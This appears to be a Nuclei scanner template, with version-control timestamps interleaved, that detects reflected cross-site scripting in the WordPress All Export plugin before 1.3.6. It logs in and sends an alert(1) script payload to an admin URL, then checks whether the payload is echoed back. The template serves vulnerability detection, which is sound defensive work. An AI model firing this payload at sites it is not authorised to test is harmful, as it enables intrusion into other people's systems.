2022-07-01 18:24:26 +00:00
id : wp-all-export-xss
info :
2022-09-08 13:28:46 +00:00
name : WordPress All Export <1.3.6 - Cross-Site Scripting
2022-07-01 18:24:26 +00:00
author : Akincibor
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
2022-07-01 18:24:26 +00:00
metadata :
verified : true
reference :
- https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
2022-09-08 13:28:46 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wp-plugin,xss,wp,wordpress,authenticated,wpscan
2022-07-01 18:24:26 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=pmxe-admin-manage&a"><script>alert(1)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
2022-07-01 18:26:05 +00:00
part : body
2022-07-01 18:24:26 +00:00
words :
- 'manage&a\"><script>alert(1)</script>">'
- 'Manage Exports'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/07